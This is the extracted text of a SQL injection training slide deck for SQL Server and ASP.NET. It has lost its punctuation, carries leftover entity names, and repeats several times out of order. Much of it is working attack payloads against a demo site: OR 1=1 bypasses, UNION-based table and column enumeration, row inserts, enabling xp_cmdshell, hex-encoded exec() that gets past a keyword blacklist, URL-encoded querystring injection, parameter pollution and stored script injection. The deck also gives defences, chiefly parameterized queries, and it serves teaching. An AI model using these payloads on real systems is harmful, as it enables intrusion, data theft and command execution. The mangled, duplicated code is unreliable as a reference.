ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
